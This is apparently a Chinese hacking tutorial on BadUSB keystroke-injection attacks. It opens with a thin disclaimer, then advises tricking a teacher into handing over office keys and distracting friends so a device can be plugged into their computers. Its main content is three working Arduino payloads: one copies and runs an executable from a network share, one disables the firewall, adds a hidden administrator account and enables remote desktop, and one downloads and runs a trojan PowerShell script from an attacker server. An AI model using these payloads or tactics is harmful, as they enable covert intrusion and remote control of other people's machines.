badusb物理黑客代码和攻击

推进阅读

插入U盘自动攻击电脑（慎用）

12个月前

020310

免责说明

前面说些话此教程不能违法只供安全测试 出事一律和我没有关系 如果你违法使用自己负责

简介

由于“Bad USB漏洞”的存在，USB闪存驱动器也成了常见的攻击目标。Bad-USB让黑客可以重新编程微控器作为一个“人机界面装置”（HID）或键盘，然后在目标机器上执行自定义键盘敲击。这种情况通常被称为“HID Payload攻击”，由于你需要向BadUSB上交你的脚本用于执行（稍后我们还会有更为详细的讨论）。尽管几乎所有的USB闪存驱动器都可以执行漏洞利用，但是重新编程“群联（Phison）”微控制器的唯一方式已经公开了。 

一些BADUSB实战的方法和利用方法

 1,首先，对于学校来说可以先社工 自己勤快点 让老师知道你很懂电脑 然后也和老师说说你管理班级的门钥匙，然后哪天说弄丢了，需要去配一把钥匙，一般老师会把办公室钥匙和教室钥匙放在一起（只是部分），然后你就得到了办公室钥匙！（此处分俩种情况）

①然后上钥匙某天偷偷的开门然后插上badusb 弄个远控之类 肯定有人说 怎么不直接手动下载 此处只是个别情况！

②如果老师给你的钥匙不和办公室一样 那么我们就 看哪天办公室没人 或者 上课请假说上厕所 一般上课老师很少在办公室。 然后插上badusb 嘿嘿嘿 肯定有人问 他锁了电脑怎么办 自己准备个pe破解密码。  如果老师让你打印资料 你可以插 但是问题是那时候老师知道你用过电脑 所以说 看你自己怎么发挥。 还有要注意摄像头！！

2.朋友家里面 首先 你去朋友家玩 然后他去上厕所 趁机插 然后还有一种部分 俩个人去 让一个人拿手机让他看个东西让他反过去看 然后趁机插 这种可以写远控 也可以写几分钟弹出 图片吓人什么的哈哈哈

badusb绕过360

#include <Keyboard.h>
void setup() {
Keyboard.begin();//开始键盘通讯 
delay(3000);//延时 
Keyboard.press(KEY_LEFT_GUI);//win键 
delay(500);
Keyboard.press('r');//r键
delay(500); 
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r'); 
delay(500);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK); 
delay(500);
Keyboard.println("CMD /K MODE CON:COLS=16 LINES=1"); 
Keyboard.release(KEY_RETURN); 
delay(300);
Keyboard.println("mkdir C:\\ProgramDATA\\test");
Keyboard.release(KEY_RETURN); 
delay(300);
Keyboard.println("COPY\\\\192.168.17.138\\www\\1.exe C:\\ProgramDATA\\test\\1.exe /Y");
Keyboard.release(KEY_RETURN); 
delay(500);Keyboard.println("C:\\ProgramDATA\\test\\1.exe && exit");
Keyboard.release(KEY_RETURN); 
delay(300);
Keyboard.release(KEY_RETURN);
Keyboard.end();//结束键盘通讯 
}
 
void loop() {
 
}

win10-badusb开启远程桌面代码

#include <Keyboard.h>
void setup() {
  Keyboard.begin();//开始键盘通讯
  
  delay(5000);//延时
  Keyboard.press(KEY_CAPS_LOCK);//开启大写锁
  Keyboard.release(KEY_CAPS_LOCK);
  delay(50);
  Keyboard.press(KEY_LEFT_GUI);//win键
  Keyboard.press('x');//x键
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('x');
  delay(500);
  Keyboard.press('a');//a键
  Keyboard.press(KEY_TAB);//tab键
  delay(500);
  Keyboard.release('a');
  Keyboard.release(KEY_TAB);
  delay(500);
  Keyboard.press(KEY_LEFT_ARROW);//左键
  Keyboard.release(KEY_RETURN);
  delay(500);
  Keyboard.press(KEY_RETURN);//按下回车键
  Keyboard.release(KEY_RETURN);//按下回车键
  delay(500);

  Keyboard.print("netsh advfirewall set allprofiles state off");//关闭防火墙
  delay(500);
  Keyboard.press(KEY_RETURN);//按下回车键
  Keyboard.release(KEY_RETURN);//按下回车键
  delay(500);

  Keyboard.print("net user winbows 000000 /add");//创建用户
  delay(500);
  Keyboard.press(KEY_RETURN);//按下回车键
  Keyboard.release(KEY_RETURN);//按下回车键
  delay(500);


  Keyboard.print("net localgroup administrators winbows /add");//将用户升级为管理
  delay(500);
  Keyboard.press(KEY_RETURN);//按下回车键
  Keyboard.release(KEY_RETURN);//按下回车键
  delay(500);

  Keyboard.print("set-itemproperty -path 'hklm:\\system\\currentcontrolset\\control\\terminal server' -name 'fdenytsconnections' -value 0");//开启远程桌面
  delay(1500);
  Keyboard.press(KEY_RETURN);//按下回车键
  Keyboard.release(KEY_RETURN);//按下回车键


  Keyboard.print("exit");//关闭窗口
  delay(500);
  Keyboard.press(KEY_RETURN);//按下回车键
  Keyboard.release(KEY_RETURN);//按下回车键

  Keyboard.end();
}

void loop() {

}

badusb

void setup() {
  // putpower shell your setup code here, to run once
  Keyboard.begin();//开始键盘通讯 
delay(3000);//延时 
Keyboard.press(KEY_LEFT_GUI);//win键 
delay(500);
Keyboard.press('r');//r键
delay(500); 
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r'); 
delay(500);
Keyboard.println("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1\"");   //使用最小化隐藏cmd窗口
//cmd /c start /minCMD /C START /MIN POWERSHELL -W HIDDEN
delay(500);
Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN); 
delay(2000);
Keyboard.println("powershell");
Keyboard.println("$clnt = new-object System.Net.WebClient;");
Keyboard.println("$url= 'http://xxx/b.ps1';");  //xxx为你服务器ip，b.ps1为生成的木马文件
Keyboard.println("$file = ' D:\\b.ps1';");      //下载到目标存放文件的地址
Keyboard.println("$clnt.DownloadFile($url,$file)");  //才用分段执行绕过防火墙进程防护
Keyboard.println("PowerShell.exe -ExecutionPolicy Bypass -File d:\\b.ps1"); //本地权限绕过执行木马脚本
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.end();//结束键盘通讯 
}
 
void loop() {
  // put your main code here, to run repeatedly:
 
}

badusb优化（1）

badusb优化（2）

win7—badusb3389代码2.0

badusb远程下载木马并执行代码

窃取文件，搭配badusb更佳